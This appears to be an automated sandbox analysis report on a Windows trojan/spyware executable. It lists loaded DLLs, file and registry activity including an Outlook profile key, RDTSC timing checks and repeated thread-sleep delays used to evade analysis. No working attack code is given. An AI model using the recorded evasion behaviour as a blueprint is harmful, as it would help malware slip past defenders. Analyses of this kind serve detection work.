            Source: rFa24c148.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/10@5/5
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_00404457 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404457
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\rFa24c148.exeFile created: C:\Program Files (x86)\shawJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrackJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeMutant created: NULL
            Source: C:\Users\user\Desktop\rFa24c148.exeFile created: C:\Users\user\AppData\Local\Temp\nsgA16E.tmpJump to behavior
            Source: rFa24c148.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\rFa24c148.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rFa24c148.exeReversingLabs: Detection: 15%
            Source: rFa24c148.exeVirustotal: Detection: 31%
            Source: C:\Users\user\Desktop\rFa24c148.exeFile read: C:\Users\user\Desktop\rFa24c148.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\rFa24c148.exe "C:\Users\user\Desktop\rFa24c148.exe"
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess created: C:\Users\user\Desktop\rFa24c148.exe "C:\Users\user\Desktop\rFa24c148.exe"
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess created: C:\Users\user\Desktop\rFa24c148.exe "C:\Users\user\Desktop\rFa24c148.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2061274960.00000000052E5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004060E1
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
            Source: C:\Users\user\Desktop\rFa24c148.exeFile created: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\rFa24c148.exeAPI/Special instruction interceptor: Address: 5AE938D
            Source: C:\Users\user\Desktop\rFa24c148.exeAPI/Special instruction interceptor: Address: 1FA938D
            Source: C:\Users\user\Desktop\rFa24c148.exeRDTSC instruction interceptor: First address: 5AAAA11 second address: 5AAAA11 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F80C4ECD97Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\rFa24c148.exeRDTSC instruction interceptor: First address: 1F6AA11 second address: 1F6AA11 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F80C48489FAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\rFa24c148.exeMemory allocated: 120000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeMemory allocated: 33440000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeMemory allocated: 33340000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599424Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599174Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599047Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598922Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598812Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598703Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598593Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598484Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598375Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598265Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598156Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598047Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597922Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596826Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596703Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596593Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596484Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596373Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596265Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596156Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 596046Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595937Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595828Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595718Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595609Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595500Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595172Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 595061Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 594515Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeWindow / User API: threadDelayed 8391Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeWindow / User API: threadDelayed 1458Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsnA538.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\rFa24c148.exeAPI coverage: 1.7 %
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -34126476536362649s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7872Thread sleep count: 8391 > 30Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7872Thread sleep count: 1458 > 30Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -599424s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -599297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -599174s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -599047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -598922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -598812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -598703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -598593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -598484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -598375s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -598265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -598156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -598047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -597922s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -597812s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -597703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -597593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -597484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -597374s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -597265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -597046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -596826s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -596703s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -596593s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -596484s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -596373s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -596265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -596156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -596046s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -595937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -595828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -595718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -595609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -595500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -595390s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -595281s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -595172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -595061s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -594953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -594843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -594734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -594625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exe TID: 7868Thread sleep time: -594515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055FF
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_004060BA FindFirstFileW,FindClose,0_2_004060BA
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_00402770 FindFirstFileW,4_2_00402770
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_004055FF GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_004055FF
            Source: C:\Users\user\Desktop\rFa24c148.exeCode function: 4_2_004060BA FindFirstFileW,FindClose,4_2_004060BA
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599424Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599297Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599174Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 599047Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598922Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598812Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598703Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598593Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598484Jump to behavior
            Source: C:\Users\user\Desktop\rFa24c148.exeThread delayed: delay time: 598375Jump to behavior
